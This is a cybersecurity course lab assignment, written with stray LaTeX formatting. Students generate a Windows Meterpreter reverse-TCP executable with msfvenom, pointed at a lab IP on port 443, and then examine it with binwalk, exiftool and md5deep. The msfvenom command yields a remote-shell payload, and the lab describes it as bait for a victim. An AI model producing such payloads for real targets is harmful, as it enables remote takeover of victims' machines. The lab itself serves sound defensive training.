Assignment $2-1$: Analyze and Classify Malware

Objective: Conduct basic static analysis on a Windows PE malware sample.

Scenario: Several employees have been targeted in phishing attempts, receiving emails with malware attachments. The task is to analyze malware samples extracted from these emails.

Tools: Kali, BinWalk, Exiftool, MD$5$deep

Exercise $1$ : Create$/$Analyze Malicious Executable

Lab Description: In this lab, the student will learn to create a malicious executable and then learn how to analyze the file.

Lab Objective: To employ analysis tools against a malware sample.

Lab Scenario: After receiving a copy of suspected malware, you're asked to analyze it and gain additional information to give to the investigatory team.

Log on to the Kali $($LAN$)$

Log on to the Kali $($LAN$)$ in as root with the password of kali.

$2.$ Kali LAN $-$ Terminal

Open a terminal by clicking on the terminal icon at the top of the screen.

$3.$ Kali LAN $-$ msfvenom $($Create Executable$)$

Let's create a malicious binary that we can host on our web server for a victim to click on:

msfvenom $-$a x$86--$platform windows $-$p windows$/$meterpreter$/$reverse$\_$tcp LHOST$=192\mathrm{.}168\mathrm{.}0\mathrm{.}100$ LPORT$=443-$f exe $-$o maliciousfile.exe

Type ls and verify the file was created.

Congratulations.

Exercise $2$ : Analyze Malware

Use various tools in Kali to analyze the malware sample.

Binwalk $-$ Analysis

Type the following into a terminal:

binwalk $-$B maliciousfile.exe

After viewing it$,$ close the window $($not the terminal$).$

$2.$ Binwalk $-$ opcode Analysis

Let's search for some commonly used opcodes. These can give us some information about what the malware may be trying to do$.$

binwalk $-$A maliciousfile.exe

$3.$ Exiftool

In a terminal at the command prompt type the following:

exiftool maliciousfile.exe

$4.$ Hash Malware

We'll run a tool called md$5$deep which is native to Kali.

Type: md$5$deep maliciousfile.exe

The hash will show up in the terminal. In your analysis report you would add this hash for future reference. concise report explaining the steps you took to in your Malware Analysis